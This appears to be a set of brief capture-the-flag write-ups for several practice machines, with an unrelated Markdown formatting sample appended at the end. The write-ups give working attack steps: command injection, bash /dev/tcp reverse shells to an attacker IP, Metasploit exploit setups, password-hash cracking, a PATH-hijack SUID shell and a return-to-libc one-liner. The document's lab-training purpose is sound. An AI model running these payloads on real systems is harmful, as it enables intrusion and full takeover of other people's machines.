1.nmap scan

2.website

it just has a login page
let’s use dirsearch to find some directories
we can see some pages redirect to login.php

we use burpsuite to catch the response,and we can see a register page but admin can use

we can use burpsuite manually change the status code to 200 ok to visit the accounts.php

and thus we can get a access to accounts.php

now we can add a user to test it
if we don’t want to have to do this for each page action. We can have Burp do this for use while we browse the site. Go to Proxy > Options > Match and Replace > Add and set the following options:

1
2
3

Type: Response header
Match: 302 Found
Replace: 200 OK

now we can download the sitebackup.zip and unzip it
in the logs.php,we can see a function uses exec and we just need to post a $delim

we can reverse the request method and add a delim to get a response

We can test for Command Injection by adding a ;curl+http://10.10.14.15/ after the POST request:

so we can try to reverse a shell to our machine

;bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1' <- this need to urlencode
nc -lvnp 8888

now we still can’t get the userflag
Next we can upgrade our shell to a more interactive one:

1
2
3

python3 -c 'import pty;pty.spawn("/bin/bash")' then press Ctrl+Z
stty raw -echo;fg then press ENTER twice
export TERM=xterm

we can get the mysql username and password from the config.php

username:root
password:mySQL_p@ssw0rd!:)
db:previse
and now we can get into the database

and in the database previse,we get two tables

we can use m4lwhere to ssh it,but first we should crack it’s password
copy the hash use hashcat to crack it with the command
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

username:m4lwhere
password:ilovecody112235!
and now we can try to ssh it

ssh m4lwhere@10.10.11.104

and we get in

finally,we get the userflag

3. getting access to root

first,we use sodo -l to find some command not need root password

Reading over the script, we see that both the gzip and the date command don’t have the full PATH set to them:

the PATH in Linux is how the system looks for the binary that we are trying to execute:

In this case, it is going to look in /usr/local/sbin then if it is not there, it looks at /usr/local/bin and so on until it is found.
We can manipulate this by changing the PATH, we can make the first entry in the PATH our current directory with the command export PATH=.:$PATH

And you can see that when I look for the cat command where our custom one is, it points out to that current directory.
So we can do the same thing with gzip or date back in the victim’s machine. First let’s create our own malicious gzip command:

cp /bin/bash /tmp/bash && chomd u+s /tmp/bash

This will create a SUID bash command that we can use for easy root access. Next we can change the PATH so that it points to our current directory:

and now execute backup.sh

and final we execute /tmp/bash -p,we get the root

1.nmap scan

2.web

from the burpsuite,we can get the response and know it build with drupal 7

when we use searchsploit,we can see some exploit

we can use msfconsole to exploit it

1
2
3
4

search drupal 7
use 1
set rhosts 10.10.10.233
set lhost 10.10.14.15

and we can get the shell

it denied us to cd /home
so we cd to sites/default and in the settings.php,we can get the database’s username and password

username:drupaluser
password:CQHEy@9M*m23gBVj

we can try this to login mysql
but in the /etc/passwd,we didn’t see drupaluser,therefore we probably need to get password hashes from the database itself:

Using the credentials drupaluser:CQHEy@9M*m23gBVj, we can get the databases users and hashes.

mysql -u drupaluser -p"CQHEy@9M*m23gBVj" -e "use drupal; select name,pass from users;"

john -w=/usr/share/wordlists/rockyou.txt hash.txt

username:brucetherealadmin
password:booboo
And we have brucetherealadmin’s password! Now let’s try to login via SSH:

3.getting root access

when we use sudo -l,Looks like we are able to run snap as the root user without any password, therefore let’s use the gtfobin for snap:

first we get fpm and do something next

gem install fpm

1.nmap scan

port exploration

9999: at 10.10.10.111:9999,it’s a simple nginx welcome page
445: smb is running on the 445,we can use common ways to find if there is something can be used

 smbmap -H 10.10.10.111 

smbmap shows nothing we can use

 smbclient -N -L //10.10.10.111

and smbclient also shows nothing interesting

1880: the 9999 port’s site gives us a url:http://forlic.htb:1880
it’s an admin web

dirsearch

we try dirsearch to all ports we find,and in 9999 there has some pages

10.10.10.111:9999/test has a phpinfo page
10.10.10.111:9999/backup has something useful
10.10.10.111:9999/dev is forbidden
10.10.10.111:9999/admin is an admin page

we can use curl 10.10.10.111:9999/backup/user.txt and curl 10.10.10.111:9999/backup/password.txt to get admin and imnothuman

dirsearch deeper

though the /dev is forbidden,we use dirsearch http:10.10.10.111:9999/dev to explore deeper
it has backup and test

in the /backup,it shows /playsms
in the /test,it provides a file name test
10.10.10.111:9999/playsms is another login page

/admin

the /admin loads a js hide the login information

the username is admin and the password is superduperlooperpassword_lol
after entering it,we can see a brainfuck code,and to decode it

https://www.dcode.fr/ook-language

it shows Nothing here check /asdiSIAJJ0QWE9JAS
after visit it,it displays a new page encoded,after decoded,we get some message

decode it,and it seems like a zip curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
unzip it,it has a password
use fcrackzip to unpack it
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip
The options are -u to force actual unzip, which weeds out tons of fps, -D for dictionary, and -p rockyou.txt to pass the wordlist.and the password=password

Use xxd to read that back to bytes, which happens to be not only ASCII, but base64 characters cat index.php | xxd -r -p

decode it,and get the text
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d

it’s brainfuck,decode at https://copy.sh/brainfuck/ and get the phrase idkwhatispass

2.shell as web

now we have two password

1.admin/superduperlooperpassword_lol 2.admin/idkwhatispass
try it at /admin /playsms and final password2 worked on /playsms

use msfconsole

1
2
3
4
5
6
7

msfconsole
search playsms
use 1
set rhost 10.10.10.111
set rport 9999
set targeturi /playsms/index.php
set lhost 10.10.14.15

then we get a webshell

3.shell as root

first improve the shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cat /proc/sys/kernel/randomize_va_space

it shows no ASLR
because we stright open it can’t read it,so we use base64 to read
and save it to local machine and use base64 -d rop_b64 > rop to restore it

open it in gdb with PEDA, and run checksec

we can force the program to crash

background

I can cause the program to crash by sending too much input which likely means I can overwrite the return address somewhere. Given that ASLR is disabled but DEP (NX) is enabled, the easiest attack path is to use Return to libc.

understand return to libc

1.stack

The stack starts at high memory addresses, and builds up to lower memory addresses. Inside any given function, there’s a stack frame. The bottom of the stack frame is stored in the RBP (or EBP on x86) register. The top is stored in RSP (or ESP). For example (and I’ll use 32-bit registers in this example since Frolic is 32-bit):

2.function call

When a function is called, the arguments are put onto the stack (either by adding space to the top or using the space already there). So, for example, the program comes to:

Just before the call, two addresses are stored in ESP and ESP+4. These are the addresses of the string to copy and the buffer to copy it to:

Now the call instruction is reached. It is going to push the next instruction to the top of the stack (as the return address), and then jump execution to the new function. The next function is going to start with some common stuff, known as the prologue:

So take that step by step. call pushes return address:

Now push ebp:

mov ebp, esp:

Finally sub esp, 0x100:

3. stack return

When a function is done, it will typically end with:

1
2

leave
ret

leave == mov esp, ebp + pop ebp
So the stack from before becomes:

Then when the return happens, the instruction pointer is popped, bringing that stack back to where it started:

4.What Is Return to libc

A return to libc attack involves overwriting the return address in such a way that the computer jumps to the function I want. The standard case is the system function, with the argument /bin/sh, giving me a shell.

If I were to call system(“/bin/sh”) normally, I would enter the function after the call but before the prologue with a stack like this:

The return address would be pushed onto the stack by the call instruction. But I’m not going to be going to system via a call, but rather a ret. So, I want the stack to look like this when I reach the return:

That way, ret will pop the system address into the instruction pointer, and the stack will look right. Since I don’t know the right return address, I’ll just use the function exit, so it cleanly exits when I’m done.

Find the Offset to EIP

open the file with gbb-peda,and When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset

When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset. I can use the ASCII or hex value:

To double check that, I’ll send in a buffer of 52 As and then 4 Bs:

Crash, with EIP as BBBB.

Addresses

Now I just need the addresses of system, exit, and /bin/sh in libc. This will vary on different hosts, so I’ll get the info with my shell on Frolic. First, I’ll get the base libc address with ldd,
Next, I’ll use readelf -s to get the offsets to various functions, and grep out system and exit,
Now I’ll use strings -a -t x to get the strings from libc with hex offsets, and grep for “/bin/sh”:

Now I can calculate the address for each of the three using any calculator (gdb here):

exploit

I can put that all together into this template: "A" * 52 + SYSTEM + EXIT + /bin/sh. I could write a python script to do this, but this case is simple enough that I can just do it as a one-liner. When I run that on Frolic, I’m root:
./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
now we finally get the flag

1.nmap scan

nmap -sCV –min-rate=10000 -p- 10.10.10.226

2.site

in the website,it has three parts
the first is nmap moudle,when we type a ip,it will send back the nmap result
the payload section allows me to generate a payload after choose ip,os and template file
the third part seems like searchspolit moudle

foothold

when we search msfvenom, we can see it has a exploit before the version 6.0.11

we can have a try
msfvenom handles an APK template file. The idea of the template file is that you can pass msfvenom a legit .exe or .apk, and it will try to build a malicious file into that file while preserving the intended capability. This functionality allows for attackers to hide behind the legit functionality.

build payload

we can use searchspolit -m 49491.py to use this
change the payload to bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' to reverse a shell
if the execution get wrong,first use apt-get install openjdk-11-jdk-headless to enable jarsigner
or we can use msfconsole to generate an apk,we should change the payload to cmd/unix/reverse_netcat

1
2
3
4
5
6
7

use msfconsole
search msfvenom
use 0
set payload cmd/unix/reverse
set lhost xxxx
run

get webshell

and we can upload the apk to the website
on the website “payloads” section, select Android for OS and upload the APK file that was generated by MetaSploit

in the /home folder,we can find two users called kid and pwn

in the pwn’s folder,we can find a script called scanlosers.sh

the script’s function is to scan ips written in /home/kid/logs/hackers
but this script doesn’t deal the input the hackers provides
so we can append a reverse shell command into the file
echo "test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' #”

3.shell as root

in the pwn,it can sudo msfconsole without password

and we get the root

we can exec command in msf or use /bin/bash -i to change to the root

1.nmap scan

nmap -sCV –min-rate=10000 -p- 10.10.10.75

2.site

web

in the website,it just has hello world,but in the source code,it hides a hint
<!-- /nibbleblog/ directory. Nothing interesting here! -->
visit it

dirsearch

we use dirsearch to display its menu and we can find some pages that can visit

when we visit some of them,we can get it’s machine menu
In exploring the resulting paths, /nibbleblog/content is interesting, and has dir lists enabled. Digging deeper, there’s a page at /nibbleblog/content/private/user.xml which reveals a user, admin, as well as the IPs that have tried to log in as it

logging into admin

visit http://10.10.10.75/nibbleblog/admin.php
we don’t have the creds,in most writeups says they guess the password or use the information get from http://10.10.10.75/nibbleblog/content/private/config.xml-admin-nibbles

Exploitaion

in the settings page, we konw that the site is nibbleblog 4.0.3
we can use searchspolit to find some poc
it has a fileupload exploit
we use msf to get webshell

after this,we can get user.txt

3.getting root

first get a fully interactive shell using the python pty.spawn one liner

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo trick
from this article,we can learn that how to use sudo-enabled files to open system-level tools like /bin/bash.
If you have write and execute permissions to a file that runs with elevated privileges, you can add commands such as system calls to get what you want.
we can use the next command to get the root

1
2
3

echo "#! /bin/bash" > monitor.sh
echo "/bin/bash -i" >> monitor.sh
sudo ./monitor.sh

h1 标题

h2 标题

h3 标题

h4 标题

h5 标题

h6 标题

水平线

文本样式

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

列表

无序

• Create a list by starting a line with +, -, or *
• Sub-lists are made by indenting 2 spaces:
  • Marker character change forces new list start:
    • Ac tristique libero volutpat at
    • Facilisis in pretium nisl aliquet
    • Nulla volutpat aliquam velit
• Very easy!

有序

1. Lorem ipsum dolor sit amet

2. Consectetur adipiscing elit

3. Integer molestie lorem at massa

4. You can use sequential numbers…

5. …or keep all the numbers as 1.

Start numbering with offset:

57. foo
58. bar

代码

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

1

Sample text here...

Syntax highlighting

1
2
3
4
5

var foo = function (bar) {
  return bar++;
};

console.log(foo(5));